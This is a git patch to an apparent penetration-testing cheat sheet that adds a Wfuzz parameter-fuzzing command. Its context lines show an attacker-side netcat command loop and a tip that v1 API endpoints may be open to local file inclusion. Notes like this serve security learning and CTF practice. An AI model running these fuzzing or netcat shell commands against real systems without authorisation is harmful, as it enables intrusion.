From 58c95f9c6e2c14d47711ae4040b9d1999593b2db Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Fri, 4 Dec 2020 12:08:12 -0500 Subject: [PATCH] Update Cheat Sheet.md --- Cheat Sheet.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Cheat Sheet.md b/Cheat Sheet.md index 069442b..8ab0ae0 100644 --- a/Cheat Sheet.md +++ b/Cheat Sheet.md @@ -190,6 +190,10 @@ Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; do Victim: ``` +### Wfuzz + +`wfuzz -c -z file,wordlist.txt --hh=0 http:////?date=FUZZ` + ### API (Applicaton Programmable Interface) * Check for possibility if there is a v1 , it is likely to be vulnerable to LFI